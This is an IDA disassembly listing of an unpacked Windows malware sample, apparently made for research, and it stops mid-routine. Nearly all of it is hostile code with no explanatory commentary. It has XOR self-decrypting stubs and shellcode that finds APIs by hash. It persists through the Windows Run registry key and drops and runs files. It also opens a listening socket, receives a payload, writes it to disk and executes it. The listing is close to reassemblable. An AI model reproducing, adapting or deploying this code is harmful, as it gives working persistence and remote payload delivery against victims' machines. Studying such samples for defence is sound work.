;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : F067164510331D5242FCC0735AA496B6
; File Name : u:\work\f067164510331d5242fcc0735aa496b6_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0006B000 ( 438272.)
; Section size in file : 0006B000 ( 438272.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 401000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_406AE0+23�p
; sub_406B60+96�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push edx
push ecx
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov edx, [ebp+arg_8]
cld
loc_401011: ; CODE XREF: sub_401000+1C�j
cmp edx, 0
jbe short loc_40101E
lodsb
stosb
dec edx
jmp short loc_401011
; ---------------------------------------------------------------------------
loc_40101E: ; CODE XREF: sub_401000+17�j
pop ecx
pop edx
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_401000 endp
; ---------------------------------------------------------------------------
align 10h
loc_401030: ; DATA XREF: sub_407140+8F�o
jmp short loc_401067
; =============== S U B R O U T I N E =======================================
sub_401032 proc near ; CODE XREF: UPX0:loc_401067�p
pop edi
xor edx, edx
sub edx, 0FFFFFFFCh
mov eax, edi
mov ecx, [eax]
mov esi, edi
loc_401041: ; CODE XREF: sub_401032+14�j
inc esi
mov ebx, [esi]
cmp ebx, ecx
jnz short loc_401041
add eax, edx
mov ecx, [eax]
add eax, edx
mov edi, eax
mov eax, esi
sub eax, edi
mov ebx, edx
xor edx, edx
div ebx
mov esi, edi
loc_40105C: ; CODE XREF: sub_401032+31�j
xor [esi], ecx
add esi, ebx
dec eax
test eax, eax
jnz short loc_40105C
jmp edi
sub_401032 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_401067: ; CODE XREF: UPX0:loc_401030�j
call sub_401032
adc [edx], esp
xor eax, [ecx+edx+11h]
adc [ecx], edx
loc_401074: ; DATA XREF: sub_407140+96�o
call sub_4010AD
pop edi
mov ecx, 11223344h
loc_40107F: ; CODE XREF: UPX0:00401084�j
inc edi
mov ebx, [edi]
cmp ebx, ecx
jnz short loc_40107F
add edi, 4
call edi
call sub_4010B0
pop edi
mov ecx, 11224433h
loc_401099: ; CODE XREF: UPX0:0040109E�j
inc edi
mov ebx, [edi]
cmp ebx, ecx
jnz short loc_401099
add edi, 4
call edi
jmp loc_4010B3
; =============== S U B R O U T I N E =======================================
sub_4010AD proc near ; CODE XREF: UPX0:loc_401074�p
pop ebx
call ebx
sub_4010AD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4010B0 proc near ; CODE XREF: UPX0:0040108E�p
pop ebx
call ebx
loc_4010B3: ; CODE XREF: UPX0:004010A8�j
push ebp
mov ebp, esp
sub esp, 90h
mov esi, esp
call sub_4013CE
mov [esi], eax
push dword ptr [esi]
push 0EC0E4E8Eh
call sub_401376
mov [esi+4], eax
push dword ptr [esi]
push 73E2D87Eh
call sub_401376
mov [esi+8], eax
push dword ptr [esi]
push 7C0017A5h
call sub_401376
mov [esi+0Ch], eax
push dword ptr [esi]
push 0E80A791Fh
call sub_401376
mov [esi+10h], eax
push dword ptr [esi]
push 0FFD97FBh
call sub_401376
mov [esi+14h], eax
push dword ptr [esi]
push 0E8AFE98h
call sub_401376
mov [esi+18h], eax
push dword ptr [esi]
push 0BFC6EB4Fh
call sub_401376
mov [esi+1Ch], eax
push 0
push 6C6C642Eh
push 32336970h
push 61766461h
push esp
call dword ptr [esi+4]
add esp, 10h
mov [esi+20h], eax
push 6C6Ch
push 642E7472h
push 6376736Dh
push esp
call dword ptr [esi+4]
add esp, 0Ch
mov [esi+30h], eax
push dword ptr [esi+20h]
push 0CE1E9395h
call sub_401376
mov [esi+24h], eax
push dword ptr [esi+20h]
push 2D1C9ADDh
call sub_401376
mov [esi+28h], eax
push dword ptr [esi+20h]
push 35E273E6h
call sub_401376
mov [esi+2Ch], eax
push dword ptr [esi+30h]
push 67875973h
call sub_401376
mov [esi+34h], eax
push dword ptr [esi+30h]
push 670F596Eh
call sub_401376
mov [esi+38h], eax
push dword ptr [esi+30h]
push 672F5BA8h
call sub_401376
mov [esi+3Ch], eax
push dword ptr [esi+30h]
push 5B7E2B9Ah
call sub_401376
mov [esi+40h], eax
push dword ptr [esi+30h]
push 0CF281CE5h
call sub_401376
mov [esi+44h], eax
push dword ptr [esi+30h]
push 0EB681AA5h
call sub_401376
mov [esi+48h], eax
push dword ptr [esi+30h]
push 0E77748A4h
call sub_401376
mov [esi+4Ch], eax
push dword ptr [esi+30h]
push 0E77018A4h
call sub_401376
mov [esi+50h], eax
push dword ptr [esi+20h]
push 0A84AEB81h
call sub_401376
mov [esi+54h], eax
push dword ptr [esi+20h]
push 0FCBA95ABh
call sub_401376
mov [esi+58h], eax
push dword ptr [esi]
push 0B8E579C1h
call sub_401376
mov [esi+5Ch], eax
push dword ptr [esi]
push 9FCF5965h
call sub_401376
mov [esi+60h], eax
push dword ptr [esi]
push 0BFC7034Fh
call sub_401376
mov [esi+64h], eax
call sub_4016F6
pop ebx
cmp eax, 0
jz loc_4012AE
mov [esi+70h], eax
push 0
push 80h
push 2
push 0
push 0
push 40000000h
push dword ptr [esi+70h]
call dword ptr [esi+0Ch]
mov [esi+74h], eax
cmp eax, 0FFFFFFFFh
jnz loc_4012F4
loc_4012AE: ; CODE XREF: sub_4010B0+1C3�j
call sub_40181F
pop ebx
cmp eax, 0
jz loc_401367
mov [esi+70h], eax
push 0
push 80h
push 2
push 0
push 0
push 40000000h
push dword ptr [esi+70h]
call dword ptr [esi+0Ch]
mov [esi+74h], eax
cmp eax, 0FFFFFFFFh
jz loc_401367
loc_4012F4: ; CODE XREF: sub_4010B0+1F8�j
push 0
mov dword ptr [esi+78h], 0
lea eax, [esi+78h]
push eax
mov eax, [ebp+8]
mov eax, [eax+4]
push eax
mov eax, [ebp+4]
lea eax, [eax+4]
push eax
push dword ptr [esi+74h]
call dword ptr [esi+10h]
push dword ptr [esi+74h]
call dword ptr [esi+14h]
mov eax, [ebp+8]
mov eax, [eax+8]
cmp eax, 0AAAAAAAAh
jnz short loc_40133B
push 1
push dword ptr [esi+70h]
call dword ptr [esi+18h]
jmp loc_401367
; ---------------------------------------------------------------------------
loc_40133B: ; CODE XREF: sub_4010B0+279�j
cmp eax, 0BBBBBBBBh
jnz short loc_401352
push 0
push dword ptr [esi+70h]
call dword ptr [esi+18h]
jmp loc_401367
; ---------------------------------------------------------------------------
loc_401352: ; CODE XREF: sub_4010B0+290�j
cmp eax, 0DDDDDDDDh
jnz short loc_401367
push dword ptr [esi+70h]
call sub_40164B
add esp, 4
loc_401367: ; CODE XREF: sub_4010B0+209�j
; sub_4010B0+23E�j ...
push dword ptr [esi+70h]
call dword ptr [esi+44h]
push 0
call dword ptr [esi+8]
retn
sub_4010B0 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401376 proc near ; CODE XREF: sub_4010B0+1C�p
; sub_4010B0+2B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push ebp
push esi
push edi
mov ebp, [esp+10h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_40138F: ; CODE XREF: sub_401376+36�j
jecxz short loc_4013C3
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
cld
loc_40139A: ; CODE XREF: sub_401376+30�j
xor eax, eax
lodsb
cmp al, ah
jz short loc_4013A8
ror edi, 0Dh
add edi, eax
jmp short loc_40139A
; ---------------------------------------------------------------------------
loc_4013A8: ; CODE XREF: sub_401376+29�j
cmp edi, [esp+10h+arg_0]
jnz short loc_40138F
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
jmp short loc_4013C5
; ---------------------------------------------------------------------------
loc_4013C3: ; CODE XREF: sub_401376:loc_40138F�j
xor eax, eax
loc_4013C5: ; CODE XREF: sub_401376+4B�j
mov edx, ebp
pop edi
pop esi
pop ebp
pop ebx
retn 8
sub_401376 endp
; =============== S U B R O U T I N E =======================================
sub_4013CE proc near ; CODE XREF: sub_4010B0+E�p
push ebp
push esi
mov eax, large fs:30h
test eax, eax
js short loc_4013E6
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
jmp short loc_4013EF
; ---------------------------------------------------------------------------
loc_4013E6: ; CODE XREF: sub_4013CE+A�j
mov eax, [eax+34h]
mov ebp, [eax+0B8h]
loc_4013EF: ; CODE XREF: sub_4013CE+16�j
mov eax, ebp
pop esi
pop ebp
retn
sub_4013CE endp
; ---------------------------------------------------------------------------
db 55h ; U
db 89h ; ‰
db 0E5h ; å
db 81h ;
db 0ECh ; ì
db 20h
db 0
db 0
db 0
db 89h ; ‰
db 0E7h ; ç
db 8Bh ; ‹
db 55h ; U
db 4
db 89h ; ‰
db 0D0h ; Ð
db 89h ; ‰
db 0D3h ; Ó
db 81h ;
db 0C3h ; Ã
db 10h
db 0
db 0
db 0
db 89h ; ‰
db 45h ; E
db 4
db 68h ; h
db 0
db 2
db 0
db 0
db 0FFh
db 56h ; V
db 40h ; @
db 81h ;
db 0C4h ; Ä
db 4
db 0
db 0
db 0
db 89h ; ‰
db 7
db 68h ; h
db 0
db 2
db 0
db 0
db 0FFh
db 56h ; V
db 40h ; @
db 81h ;
db 0C4h ; Ä
db 4
db 0
db 0
db 0
db 89h ; ‰
db 47h ; G
db 4
db 0FFh
db 37h ; 7
db 68h ; h
db 0
db 2
db 0
db 0
db 0FFh
db 56h ; V
db 1Ch
db 0C7h ; Ç
db 47h ; G
db 8
db 0
db 0
db 0
db 0
db 8Dh ;
db 47h ; G
db 8
db 50h ; P
db 8Bh ; ‹
db 55h ; U
db 4
db 89h ; ‰
db 0D3h ; Ó
db 81h ;
db 0C3h ; Ã
db 10h
db 0
db 0
db 0
db 53h ; S
db 68h ; h
db 2
db 0
db 0
db 80h ; €
db 0FFh
db 56h ; V
db 24h ; $
db 85h ; …
db 0C0h ; À
db 0Fh
db 84h ; „
db 27h ; '
db 0
db 0
db 0
db 0C7h ; Ç
db 47h ; G
db 8
db 0
db 0
db 0
db 0
db 8Dh ;
db 47h ; G
db 8
db 50h ; P
db 8Bh ; ‹
db 55h ; U
db 4
db 89h ; ‰
db 0D3h ; Ó
db 81h ;
db 0C3h ; Ã
db 10h
db 0
db 0
db 0
db 53h ; S
db 68h ; h
db 1
db 0
db 0
db 80h ; €
db 0FFh
db 56h ; V
db 24h ; $
db 85h ; …
db 0C0h ; À
db 0Fh
db 85h ; …
db 61h ; a
db 0
db 0
db 0
db 0FFh
db 37h ; 7
db 0FFh
db 77h ; w
db 4
db 0FFh
db 56h ; V
db 34h ; 4
db 81h ;
db 0C4h ; Ä
db 8
db 0
db 0
db 0 ; DATA XREF: UPX0:off_428480�o
db 0C6h ; Æ
db 47h ; G
db 0Ch
db 5Ch ; \
db 0C6h ; Æ
db 47h ; G
db 0Dh
db 0
db 8Dh ;
db 47h ; G
db 0Ch
db 50h ; P
db 0FFh
db 77h ; w
db 4
db 0FFh
db 56h ; V
db 38h ; 8
db 81h ;
db 0C4h ; Ä
db 8
db 0
db 0
db 0
db 0FFh
db 75h ; u
db 0Ch
db 0FFh
db 77h ; w
db 4
db 0FFh
db 56h ; V
db 38h ; 8
db 81h ;
db 0C4h ; Ä
db 8
db 0
db 0
db 0
db 0FFh
db 77h ; w
db 4
db 0FFh
db 56h ; V
db 3Ch ; <
db 81h ;
db 0C4h ; Ä
db 4
db 0
db 0
db 0
db 50h ; P
db 0FFh
db 77h ; w
db 4
db 68h ; h
db 1
db 0
db 0
db 0
db 68h ; h
db 0
db 0
db 0
db 0
db 8Dh ;
db 45h ; E
db 4
db 8Bh ; ‹
db 0
db 50h ; P
db 0FFh
db 77h ; w
db 8
db 0FFh
db 56h ; V
db 28h ; (
db 0FFh
db 77h ; w
db 8
db 0FFh
db 56h ; V
db 2Ch ; ,
db 0FFh
db 77h ; w
db 4
db 0FFh
db 56h ; V
db 44h ; D
db 0FFh
db 37h ; 7
db 0FFh
db 56h ; V
db 44h ; D
db 8Bh ; ‹
db 5Dh ; ]
db 8
db 89h ; ‰
db 5Dh ; ]
db 4
db 89h ; ‰
db 0ECh ; ì
db 5Dh ; ]
db 0C3h ; Ã
align 10h
dd 0FFFEEFE8h, 656E64FFh, 64707574h, 657461h, 54464F53h
dd 45524157h, 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h
dd 435C7377h, 65727275h, 6556746Eh, 6F697372h, 75525C6Eh
db 6Eh, 5Ch, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40153F proc near ; CODE XREF: sub_40164B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov edi, esp
mov edx, [ebp+4]
mov eax, edx
mov ebx, edx
add ebx, 10h
mov [ebp+4], eax
push 200h
call dword ptr [esi+40h]
add esp, 4
mov [edi], eax
push 200h
call dword ptr [esi+40h]
add esp, 4
mov [edi+4], eax
push dword ptr [edi]
push 200h
call dword ptr [esi+1Ch]
mov dword ptr [edi+8], 0
lea eax, [edi+8]
push eax
mov edx, [ebp+4]
mov ebx, edx
add ebx, 10h
push ebx
push 80000002h
call dword ptr [esi+24h]
test eax, eax
jz loc_4015D3
mov dword ptr [edi+8], 0
lea eax, [edi+8]
push eax
mov edx, [ebp+4]
mov ebx, edx
add ebx, 10h
push ebx
push 80000001h
call dword ptr [esi+24h]
test eax, eax
jnz loc_401634
loc_4015D3: ; CODE XREF: sub_40153F+67�j
push dword ptr [edi]
push dword ptr [edi+4]
call dword ptr [esi+34h]
add esp, 8
mov byte ptr [edi+0Ch], 5Ch
mov byte ptr [edi+0Dh], 0
lea eax, [edi+0Ch]
push eax
push dword ptr [edi+4]
call dword ptr [esi+38h]
add esp, 8
push [ebp+arg_4]
push dword ptr [edi+4]
call dword ptr [esi+34h]
add esp, 8
push dword ptr [edi+4]
call dword ptr [esi+3Ch]
add esp, 4
push eax
push dword ptr [edi+4]
push 1
push 0
lea eax, [ebp+4]
mov eax, [eax]
push eax
push dword ptr [edi+8]
call dword ptr [esi+28h]
push dword ptr [edi+8]
call dword ptr [esi+2Ch]
loc_401634: ; CODE XREF: sub_40153F+8E�j
push dword ptr [edi+4]
call dword ptr [esi+44h]
push dword ptr [edi]
call dword ptr [esi+44h]
mov ebx, [ebp+arg_0]
mov [ebp+4], ebx
mov esp, ebp
pop ebp
retn
sub_40153F endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
; =============== S U B R O U T I N E =======================================
sub_40164B proc near ; CODE XREF: sub_4010B0+2AC�p
; FUNCTION CHUNK AT 004016BB SIZE 0000003B BYTES
call sub_40153F
outs dx, byte ptr fs:[esi]
db 65h
jz short near ptr loc_4016C8+2
jo short loc_4016BB
popa
jz short near ptr loc_4016BD+2
add [ebx+4Fh], dl
inc esi
push esp
push edi
inc ecx
push edx
inc ebp
pop esp
dec ebp
imul esp, [ebx+72h], 666F736Fh
jz short near ptr loc_4016C8+2
push edi
imul ebp, [esi+64h], 5C73776Fh
inc ebx
jnz short near ptr loc_4016EA+1
jb short near ptr loc_4016DF+1
outsb
jz short loc_4016D4
db 65h
jb short loc_4016F4
imul ebp, [edi+6Eh], 6E75525Ch
pop esp
add [ebp-77h], dl ; CODE XREF: sub_4016F6�p
sub_40164B endp ; sp-analysis failed
in eax, 81h ; DMA page register 74LS612:
; Channel 2 (diskette DMA) (address bits 16-23)
in al, dx
or al, 0
; ---------------------------------------------------------------------------
db 2 dup(0), 89h
dd 20068E7h, 56FF0000h, 4C48140h, 89000000h, 1046807h
dd 37FF0000h, 3D5C56FFh, 0
; ---------------------------------------------------------------------------
jnz short loc_4016BB
jmp loc_4016EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_40164B
loc_4016BB: ; CODE XREF: sub_40164B+A�j
; UPX0:004016B4�j
push dword ptr [edi]
loc_4016BD: ; CODE XREF: sub_40164B+D�j
call dword ptr [esi+64h]
push dword ptr [ebp+4]
push dword ptr [edi]
call dword ptr [esi+38h]
loc_4016C8: ; CODE XREF: sub_40164B+7�j
; sub_40164B+21�j
add esp, 8
push edi
call loc_401908
loc_4016D4: ; CODE XREF: sub_40164B+31�j
add esp, 4
pop edi
mov [edi+4], eax
push eax
loc_4016DF: ; CODE XREF: sub_40164B+2E�j
push dword ptr [edi]
call dword ptr [esi+38h]
add esp, 8
loc_4016EA: ; CODE XREF: sub_40164B+2C�j
mov eax, [edi]
loc_4016EC: ; CODE XREF: UPX0:004016B6�j
mov ebx, [ebp+8]
mov [ebp+4], ebx
mov esp, ebp
loc_4016F4: ; CODE XREF: sub_40164B+33�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_40164B
; =============== S U B R O U T I N E =======================================
sub_4016F6 proc near ; CODE XREF: sub_4010B0+1B8�p
call near ptr loc_401689+1
pop esp
add [ebp-77h], dl ; CODE XREF: sub_40181F�p
sub_4016F6 endp ; sp-analysis failed
in eax, 81h ; DMA page register 74LS612:
; Channel 2 (diskette DMA) (address bits 16-23)
in al, dx
adc [eax], al
; ---------------------------------------------------------------------------
dd 0E7890000h, 20068h, 4056FF00h, 4C481h, 7890000h, 447C7h
dd 8D000000h, 68500447h, 1, 68h, 475FF00h, 168h, 5456FF80h
dd 3Dh, 0CD850F00h, 0C7000000h, 2000847h, 478D0000h, 37FF5008h
dd 10C47C7h, 8D000000h, 68500C47h, 0
; ---------------------------------------------------------------------------
mov eax, [ebp+4]
add eax, 41h
push eax
push dword ptr [edi+4]
call dword ptr [esi+58h]
cmp eax, 0
jnz loc_401810
mov eax, [ebp+4]
add eax, 62h
push eax
push dword ptr [edi]
call dword ptr [esi+38h]
add esp, 8
mov eax, [ebp+4]
add eax, 4Fh
push eax
push dword ptr [edi]
call dword ptr [esi+38h]
add esp, 8
mov eax, [ebp+4]
add eax, 62h
push eax
push dword ptr [edi]
call dword ptr [esi+38h]
add esp, 8
mov eax, [ebp+4]
add eax, 59h
push eax
push dword ptr [edi]
call dword ptr [esi+38h]
add esp, 8
push 0
push dword ptr [edi]
call dword ptr [esi+60h]
push dword ptr [edi]
call dword ptr [esi+64h]
mov eax, [ebp+4]
add eax, 62h
push eax
push dword ptr [edi]
call dword ptr [esi+38h]
add esp, 8
push edi
call loc_401908
add esp, 4
pop edi
mov [edi+8], eax
push eax
push dword ptr [edi]
call dword ptr [esi+38h]
add esp, 8
mov eax, [edi]
jmp loc_401815
; ---------------------------------------------------------------------------
loc_401810: ; CODE XREF: UPX0:00401774�j
mov eax, 0
loc_401815: ; CODE XREF: UPX0:0040180B�j
mov ebx, [ebp+8]
mov [ebp+4], ebx
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
sub_40181F proc near ; CODE XREF: sub_4010B0:loc_4012AE�p
; FUNCTION CHUNK AT 00401893 SIZE 00000073 BYTES
call near ptr loc_4016FC+1
push ebx
dec edi
inc esi
push esp
push edi
inc ecx
push edx
inc ebp
pop esp
dec ebp
imul esp, [ebx+72h], 666F736Fh
jz short loc_401893
push edi
imul ebp, [esi+64h], 5C73776Fh
inc ebx
jnz short near ptr loc_4018B3+1
jb short near ptr loc_4018A5+4
outsb
jz short near ptr loc_40189B+2
db 65h
jb short loc_4018BD
imul ebp, [edi+6Eh], 7078455Ch
insb
outsd
jb short near ptr loc_4018B5+5
jb short loc_4018B3
push ebx
push 206C6C65h
inc esi
outsd
insb
db 64h, 65h
jb short near ptr loc_4018D5+2
add [edi+ebp*2+63h], cl
popa
insb
and [ecx+70h], al
jo short loc_4018B3
popa
jz short near ptr loc_4018D0+3
add [ebp+69h], cl
arpl [edx+6Fh], si
jnb short near ptr loc_4018E5+4
db 66h
jz short $+3
push edi
imul ebp, [esi+54h], 736C6F6Fh
add [eax+eax+55h], bl ; CODE XREF: UPX0:loc_401908�p
sub_40181F endp ; sp-analysis failed
mov ebp, esp
sub esp, 20h
mov edi, esp
; START OF FUNCTION CHUNK FOR sub_40181F
loc_401893: ; CODE XREF: sub_40181F+16�j
push 0
call dword ptr [esi+48h]
loc_40189B: ; CODE XREF: sub_40181F+26�j
add esp, 4
push eax
call dword ptr [esi+4Ch]
loc_4018A5: ; CODE XREF: sub_40181F+23�j
add esp, 4
call dword ptr [esi+50h]
mov ebx, 4
loc_4018B3: ; CODE XREF: sub_40181F+36�j
; sub_40181F+4E�j ...
div ebx
loc_4018B5: ; CODE XREF: sub_40181F+34�j
cmp edx, 1
jz short loc_4018D5
loc_4018BD: ; CODE XREF: sub_40181F+28�j
cmp edx, 2
jz short loc_4018E2
cmp edx, 3
jz short loc_4018EF
mov eax, [ebp+4]
loc_4018D0: ; CODE XREF: sub_40181F+51�j
jmp loc_4018FC
; ---------------------------------------------------------------------------
loc_4018D5: ; CODE XREF: sub_40181F+9C�j
; sub_40181F+41�j
mov eax, [ebp+4]
add eax, 0Dh
jmp loc_4018FC
; ---------------------------------------------------------------------------
loc_4018E2: ; CODE XREF: sub_40181F+A4�j
mov eax, [ebp+4]
loc_4018E5: ; CODE XREF: sub_40181F+59�j
add eax, 1Bh
jmp loc_4018FC
; ---------------------------------------------------------------------------
loc_4018EF: ; CODE XREF: sub_40181F+AC�j
mov eax, [ebp+4]
add eax, 29h
jmp $+5
loc_4018FC: ; CODE XREF: sub_40181F:loc_4018D0�j
; sub_40181F+BE�j ...
mov ebx, [ebp+8]
mov [ebp+4], ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_40181F
; ---------------------------------------------------------------------------
align 4
loc_401908: ; CODE XREF: sub_40164B+84�p
; UPX0:004017EE�p
call near ptr loc_401885+3
ja short near ptr dword_401978
outsb
insb
outsd
imul ebp, [bp+2Eh], 657865h
outsb
db 65h
jz short near ptr byte_401993
jo short near ptr dword_401984
popa
jz short near ptr dword_401988
db 2Eh, 65h
js short near ptr dword_40198C
add [edi+69h], dh
outsb
jnz short loc_40199D
db 64h
popa
jz short near ptr word_401996
db 2Eh, 65h
js short near ptr word_40199A
add [edi+69h], dh
outsb
insb
outsd
db 67h, 2Eh, 65h
js near ptr 19A5h
; ---------------------------------------------------------------------------
dd 90900000h, 33449090h, 90901122h, 0FF5B9090h, 332211D3h
dd 0BBBBBB44h, 0AAAAAABBh, 61772FAAh, 2E6C7070h, 0FF657865h
dd 4 dup(0FFFFFFFFh)
dword_401978 dd 3 dup(0FFFFFFFFh) ; CODE XREF: UPX0:0040190D�j
dword_401984 dd 0FFFFFFFFh ; CODE XREF: UPX0:0040191E�j
dword_401988 dd 0FFFFFFFFh ; CODE XREF: UPX0:00401921�j
dword_40198C dd 0FFFFFFFFh ; CODE XREF: UPX0:00401923�j
db 3 dup(0FFh)
byte_401993 db 0FFh ; CODE XREF: UPX0:0040191B�j
db 2 dup(0FFh)
word_401996 dw 0FFFFh ; CODE XREF: UPX0:0040192F�j
db 2 dup(0FFh)
word_40199A dw 0FFFFh ; CODE XREF: UPX0:00401931�j
db 0FFh
; ---------------------------------------------------------------------------
loc_40199D: ; CODE XREF: UPX0:0040192B�j
nop
nop
nop
nop
xor eax, [edx+11h]
nop
nop
nop
nop
pop ebx
call ebx
adc [edx], esp
xor eax, [eax+edx*4-70h]
nop
nop
adc [edx], esp
xor eax, [eax+edx*4-70h]
mov eax, eax
; ---------------------------------------------------------------------------
db 4 dup(0CCh)
; ---------------------------------------------------------------------------
loc_4019C0: ; CODE XREF: UPX0:00401CD1�j
; DATA XREF: sub_404C60+9�o ...
jmp short loc_4019D2
; =============== S U B R O U T I N E =======================================
sub_4019C2 proc near ; CODE XREF: sub_4019C2:loc_4019D2�p
; FUNCTION CHUNK AT 00401C2E SIZE 00000005 BYTES
pop edx
dec edx
xor ecx, ecx
mov cx, 2F8h
loc_4019CA: ; CODE XREF: sub_4019C2+C�j
xor byte ptr [edx+ecx], 99h
loop loc_4019CA
jmp short loc_4019D7
; ---------------------------------------------------------------------------
loc_4019D2: ; CODE XREF: UPX0:loc_4019C0�j
call sub_4019C2
loc_4019D7: ; CODE XREF: sub_4019C2+E�j
; DATA XREF: sub_404C60+2F�o ...
jmp loc_401C2E
sub_4019C2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019DC proc near ; CODE XREF: sub_4019C2:loc_401C2E�p
var_80 = word ptr -80h
var_7E = word ptr -7Eh
var_7C = dword ptr -7Ch
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
nop
nop
nop
push ebp
mov ebp, esp
sub esp, 70h
mov esi, esp
call sub_401C9A
mov [esi], eax
push dword ptr [esi]
push 0EC0E4E8Eh
call sub_401C42
mov [esi+4], eax
push 6C6Ch
push 642E3233h
push 5F327377h
push esp
call dword ptr [esi+4]
mov [esi+8], eax
push dword ptr [esi]
push 91AFCA54h
call sub_401C42
mov [esi+0Ch], eax
push dword ptr [esi+8]
push 3BFCEDCBh
call sub_401C42
mov [esi+10h], eax
push dword ptr [esi+8]
push 492F0B6Eh
call sub_401C42
mov [esi+14h], eax
push dword ptr [esi+8]
push 0C7701AA4h
call sub_401C42
mov [esi+18h], eax
push dword ptr [esi+8]
push 0E92EADA4h
call sub_401C42
mov [esi+1Ch], eax
push dword ptr [esi+8]
push 498649E5h
call sub_401C42
mov [esi+20h], eax
push dword ptr [esi+8]
push 5B1E69EEh
call sub_401C42
mov [esi+28h], eax
push dword ptr [esi+8]
push 0E71819B6h
call sub_401C42
mov [esi+2Ch], eax
push dword ptr [esi+8]
push 79C679E7h
call sub_401C42
mov [esi+34h], eax
push dword ptr [esi]
push 7C0017A5h
call sub_401C42
mov [esi+40h], eax
push dword ptr [esi]
push 0E80A791Fh
call sub_401C42
mov [esi+44h], eax
push dword ptr [esi]
push 0FFD97FBh
call sub_401C42
mov [esi+48h], eax
push dword ptr [esi]
push 0E8AFE98h
call sub_401C42
mov [esi+50h], eax
push 40h
push 3000h
push 100000h
push 0
call dword ptr [esi+0Ch]
mov [esi+5Ch], eax
sub esp, 190h
push esp
push 202h
call dword ptr [esi+10h]
push 0
push 1
push 2
call dword ptr [esi+14h]
mov [esi+60h], eax
sub esp, 10h
mov [esp+80h+var_80], 2
mov edx, [ebp+4]
mov eax, [edx]
mov [esp+80h+var_7E], ax
mov [esp+80h+var_7C], 0
mov edx, esp
push 10h
push edx
push dword ptr [esi+60h]
call dword ptr [esi+18h]
push 0Fh
push dword ptr [esi+60h]
call dword ptr [esi+1Ch]
sub esp, 10h
mov edx, esp
mov dword ptr [esi+64h], 10h
lea eax, [esi+64h]
push eax
push edx
push dword ptr [esi+60h]
call dword ptr [esi+20h]
mov [esi+6Ch], eax
mov [esp+70h+var_70], 1
mov eax, [esi+6Ch]
mov [esp+70h+var_6C], eax
mov edx, esp
push 0
push 0
push edx
push 0
push 0
call dword ptr [esi+28h]
mov edx, [esi+5Ch]
mov [esi+68h], edx
mov dword ptr [esi+64h], 0
loc_401B9F: ; CODE XREF: sub_4019DC+1E3�j
push 0
push 1000h
push dword ptr [esi+68h]
push dword ptr [esi+6Ch]
call dword ptr [esi+2Ch]
add [esi+68h], eax
add [esi+64h], eax
cmp eax, 0
jle short loc_401BC1
jmp short loc_401B9F
; ---------------------------------------------------------------------------
loc_401BC1: ; CODE XREF: sub_4019DC+1E1�j
push dword ptr [esi+60h]
call dword ptr [esi+34h]
push dword ptr [esi+6Ch]
call dword ptr [esi+34h]
push 0
push 80h
push 2
push 0
push 0
push 40000000h
mov edx, [ebp+4]
lea eax, [edx+4]
push eax
call dword ptr [esi+40h]
mov [esi+68h], eax
push 0
mov dword ptr [esi+6Ch], 0
lea eax, [esi+6Ch]
push eax
push dword ptr [esi+64h]
push dword ptr [esi+5Ch]
push dword ptr [esi+68h]
call dword ptr [esi+44h]
push dword ptr [esi+68h]
call dword ptr [esi+48h]
push 1
mov edx, [ebp+4]
lea eax, [edx+4]
push eax
call dword ptr [esi+50h]
mov esp, ebp
pop ebp
pop eax
retn
sub_4019DC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4019C2
loc_401C2E: ; CODE XREF: sub_4019C2:loc_4019D7�j
call sub_4019DC
; END OF FUNCTION CHUNK FOR sub_4019C2
; ---------------------------------------------------------------------------
byte_401C33 db 0 ; DATA XREF: sub_404C60+53�o
dd 77000800h, 6F6C6E69h, 78652E67h
db 65h, 0
; =============== S U B R O U T I N E =======================================
sub_401C42 proc near ; CODE XREF: sub_4019DC+19�p
